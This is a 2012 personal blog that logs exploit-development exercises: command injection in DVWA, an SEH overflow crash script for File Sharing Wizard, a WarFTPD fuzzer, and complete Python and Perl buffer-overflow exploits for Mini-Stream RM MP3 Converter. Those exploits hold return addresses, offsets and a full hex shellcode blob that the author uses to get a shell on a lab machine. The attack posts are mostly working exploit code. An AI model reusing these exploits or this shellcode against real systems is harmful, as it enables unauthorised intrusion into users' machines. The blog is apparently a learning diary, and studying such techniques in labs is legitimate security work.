Sabtu, 17 Maret 2012

exploitation linux server with dvwa vuln

so long my blog can't access by me, cause damn game but very fun to do. now i learn how we can exploitation to system through web aplication vuln, in my virutal server has installed DVWA (Damn Vulnerability Web Aplication) i will attack them. now i will try to bugging error to decission attack system.

this picture is dvwa screen, in many vuln i will attack command execution service has available on dvwa. i think is so easy to try exploitaion. on linux command we can use two command on command same time example "ls | w" next command will be the firs execution than the first command.

Kamis, 01 Maret 2012

SEH (Exploitation File Sharing)

in this time i will try to developing exploitation with buffer overflow aplication have safeSEH / SEH, i will exploit file sharing wizard, in this time not so different just developing from exploitation before, like local exploit. but in this aplication have protection to buffer overflow, ok the firs like usually i will create exploitation program to first buffer and to analyse,,
to know how we made exploit we must sniff with wireshark to acompiling exploit to make buffer the aplication, in this time i founded aplication running on port 80 you can see at the picture
now i will make exploitation like a exploitation i made before:
! usr / bin / python
import socket
target_address = "192.168.4.44"
target_port = 80
buffer ="\x41" * 10000
buffer+=('fuck %s HTTP/1.1\r\n''\r\n') %(buffer)
sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect = sock.connect ((target_address, target_port))
sock.send(buffer)
sock.close()

now see what happpen at file sharing wizard

aplication has crash :d, ok i will develop again
aplication has crash but EIP not overwrite because aplication file sharing have SEH, to see SEH click menu view then SEH chain, like the pciture. buffer has send save to SEH chain.
solution for aplication has SEH chain is POP POP RETN method.
now i make buffer again, now i will send string 10000 character
will be continued

Minggu, 12 Februari 2012

exploitation local exploit MP3 Converter

now i try again to buffer overflow RM MP3, in this step to check buffer i use 3 code to make buffer the first make 10000 string caracter, the second 20000 caracter, third 30000 caracter, i will try one by one to know how many caracter i need to make buffer RM MP3.
in this job i use:
OllyDBG
Mini Stream RM MP3 Conveter
exploit make it by my self
file to buffer made by myself
ok lets begin try to buffer, start to 10000 character no buffer :'(, second try 20000 character, yupp,, buffer, try again with 30000 character, yupp,, buffer again, boom boom buffer

now i search on how many byte eip can buffer, i create string pattern 20000 character to known how byte need to go EIP and ESP. yupp got it boom crash again :D, now we will take EIP and ESP, EIP on root@cupenk:/pentest/exploits/framework/tools# ./pattern_offset.rb 0x36695735 20000
17417 <=
ESP: root@cupenk:/pentest/exploits/framework/tools# ./pattern_offset.rb i8W 20000
17425
ok next make program again to finding JMP ESP
i will create on EIP character DADADADA
yupp.. created.. 
#!usr/bin/python
file="eip.m3u"
junk="http://"+"\x90" * 17417
junk+="\xDA\xDA\xDA\xDA"
file=open(file,'w')
file.write(junk)
print ("success idiot")
file.close()

now i will find create ESP: gotcha,, has created on esp CACACACACA :d
now i will find JMP ESP although shell.32, yup get it JMP ESP on 7C9D30D7:
after checked and binggo JMP ESP has get it now i will create the exploit
now i will create the exploit, i use my payload for exploitation before
#!usr/bin/python
file="exploit.m3u"
junk="http://"+"\x90" * 17417
junk+="\xD7\x30\x9D\x7C"
junk+="\x90" * 32
junk+=("\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
file=open(file,'w')
file.write(junk)
print ("success idiot")
file.close()
binggo crash,, crash,, crash,, now i will try telnet to victim:
gotcha,, let dance dance dance hahaa,,, done done done under attack.
successs...


buffer overlow RM MP3

now i learn again buffer overflow, now i make buffer RM MP3, to make buffer i make file with perl script:

my $file= "crash2.m3u";
my $junk= "\x41" x 30000; => this i change to know how many caracter to buffer
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";

now i run this script to make file crash2.m3u then next step crash file will run on MP3 Converter
when i run on aplication RM MP3 nothing crash, i've fail but no problem i try make file with other script i make him from script exploitdb:

my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 26121;

open(MYFILE,'>>asu.m3u');

print MYFILE $Header.$ex;

close(MYFILE);

then i run this perl script and next i run file to RM MP3 and tara tara,, boom,, crash i dont know what happen on my script before. and i must know it.. RM MP3 buffer on 20000 and 30000
now i change character A with character i make it with pattern create.
now i try again what happen next 










i feel something wrong in there, but i will try again, so keept move on,,
now to create exploit i must know where
to get EIP need data 17417 byte, and go to stack need 17425
now i will write on EIP DADADADA
so i will write to syntax:

my $Header = "#EXTM3U\n";
my $ex="http://"."\x90" x 17417;
my $ex1="\xDA\xDA\xDA\xDA";
open (MYFILE,'>>b.m3u');

print MYFILE $Header.$ex.$ex1;

close(MYFILE);
yeaaa,, overwrite to EIP DADADADA so i get EIP, 
but to write len on perl i dont know,, haha,, so skip this step to check EIP has got it i write EIP code with ESP JMP.






now i will write code again to make exploitation on windows, oh no i do something wrong my payload can't work: i've problem with payload again

file="fuck3.m3u"
junk="http://"+"\x90"* 17417
junk+="x\D7\x30\x9D\x7C"
junk+="\x90" * 32
junk+=("\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
file=open(file,'w')
file.write(junk)
print("success")
file.close()

Jumat, 10 Februari 2012

download

http://www.mediafire.com/?w77a06erasgs6nl

exploitation development > warftpd

this next step i learn about buffer overflow, in this step i try to exploit windows xp3 through buffer overflow vuln. in learn this method i need aplication WarFTPD, Metasploit, OllyDBG, to get vuln need fuzzer, i use fuzzer write by mrp.bpp he is my guru's:

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41"*1000
s.connect(('192.168.9.239',21)) > ip target
data=s.recv(1024)
print("sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
this program has set to ip victim is 192.168.9.239, now i try run this..
no.. i've fail, my warftpd can't run when i run on ollydbg, i hope i can solve this problem

Kamis, 09 Februari 2012

buffer overflow

Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow.

C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer and complicate the language.

While C's simplicity increases the programmer's control and the efficiency of the resulting programs, it can also result in programs that are vulnerable to buffer overflows and memory leaks if the programmer isn't careful. This means that once a variable is allocated memory, there are no built-in safeguards to ensure that the contents of a variable fit into the allocated memory space. If a programmer wants to put ten bytes of data into a buffer that had only been allocated eight bytes of space, that type of action is allowed, even though it will most likely cause the program to crash. This is known as a buffer overrun or buffer overflow, since the extra two bytes of data will overflow and spill out of the allocated memory, overwriting whatever happens to come next. If a critical piece of data is overwritten, the program will crash. The overflow_example.c code offers an example
 

int main(int argc, char *argv[]) {
   int value = 5;
   char buffer_one[8], buffer_two[8]; 
 
reference:art of exploitation 2nd edition 

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Cup3nK - Premium Blogger Themes | Hosted Desktop